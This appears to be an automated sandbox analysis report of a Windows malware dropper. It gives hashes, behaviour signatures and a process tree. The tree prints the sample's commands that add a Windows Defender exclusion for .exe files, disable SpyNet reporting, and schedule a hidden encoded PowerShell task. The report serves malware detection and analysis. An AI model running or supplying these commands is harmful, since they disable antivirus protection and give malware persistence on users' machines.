Analysis

  • max time kernel
    4s
  • max time network
    14s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20230915-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    03/10/2023, 08:13

General

  • Target

    02f3c1cecd341c0a023bc4ca9bfe435266327af571bb590d1f3acd661bc22ac4.exe

  • Size

    7.2MB

  • MD5

    71b7099f3f23955a8bc45829c9d0f05c

  • SHA1

    9372a91e395b9b773fa5e354212a5ae6476eb9b5

  • SHA256

    02f3c1cecd341c0a023bc4ca9bfe435266327af571bb590d1f3acd661bc22ac4

  • SHA512

    3532561545e52416c23497f76a0a79a7b8ecb3888f27d16cbcffcf850b043d1b7f96589627938385091855446bfff34b77b73a2d73ca9011d98c6018b3e41b36

  • SSDEEP

    196608:91O1W/pZgf52/wbIUXU3GYKPA99OJO1bytyfKhs11:3OEQUwCNUWsJHU

Score
7/10

Malware Config

Signatures

  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\02f3c1cecd341c0a023bc4ca9bfe435266327af571bb590d1f3acd661bc22ac4.exe
    "C:\Users\Admin\AppData\Local\Temp\02f3c1cecd341c0a023bc4ca9bfe435266327af571bb590d1f3acd661bc22ac4.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2960
    • C:\Users\Admin\AppData\Local\Temp\7zSD002.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2856
      • C:\Users\Admin\AppData\Local\Temp\7zSD12B.tmp\Install.exe
        .\Install.exe /qGSediddTgIM "385118" /S
        3⤵
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:4420
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3088
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3912
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
              6⤵
                PID:3488
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                6⤵
                  PID:3648
            • C:\Windows\SysWOW64\forfiles.exe
              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:4404
              • C:\Windows\SysWOW64\cmd.exe
                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:2004
                • \??\c:\windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                  6⤵
                    PID:3336
                  • \??\c:\windows\SysWOW64\reg.exe
                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                    6⤵
                      PID:4352
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /CREATE /TN "gIFUvuebt" /SC once /ST 05:46:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                  4⤵
                  • Creates scheduled task(s)
                  PID:60
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /run /I /tn "gIFUvuebt"
                  4⤵
                    PID:4700
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
              1⤵
                PID:916

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\7zSD002.tmp\Install.exe
    Filesize
    6.1MB
    MD5
    50e91b05c3b7d81790a35fed550e6475
    SHA1
    7bf8e68a0ddd556d448333eef00012e5e8fae454
    SHA256
    693b54b819fc7779b066aa0e3ff17bf80f1c297c49a381825d5d662a1d5e95a5
    SHA512
    942dac20d64c196740374c96a2169b599596fa72695eddce53995fde7cf753bbc01783db7b71af3cb9379d420983a60f3d6a67dcccdc79dcff9738ec8824b928

  • C:\Users\Admin\AppData\Local\Temp\7zSD12B.tmp\Install.exe
    Filesize
    6.8MB
    MD5
    3f03a068ff69ab813dd885d0b8859d4f
    SHA1
    4a2bd1bd2abee50d847b61ab5c50295108a79765
    SHA256
    d7ea53fc6ff0c47b0f9fd0c4fd75e40bc9541a9484f00e4f7e956995873a7214
    SHA512
    270f7e49c40b72f9961fa340c758abaa3d9af9af29d8e7b1a13f3d7957b8d1a71b3884bed3d592e995f116620322357effdef92f4d96c1fc737f4c5055781d12

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m0xiapno.lo4.ps1
    Filesize
    60B
    MD5
    d17fe0a3f47be24a6453e9ef58c94641
    SHA1
    6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256
    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512
    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/916-16-0x00007FFED0560000-0x00007FFED1021000-memory.dmp
    Filesize
    10.8MB

  • memory/916-17-0x000001C14B200000-0x000001C14B210000-memory.dmp
    Filesize
    64KB

  • memory/916-23-0x000001C14B200000-0x000001C14B210000-memory.dmp
    Filesize
    64KB

  • memory/916-28-0x000001C165AC0000-0x000001C165AE2000-memory.dmp
    Filesize
    136KB

  • memory/4420-11-0x0000000000DC0000-0x000000000148B000-memory.dmp
    Filesize
    6.8MB

  • memory/4420-12-0x0000000010000000-0x0000000010591000-memory.dmp
    Filesize
    5.6MB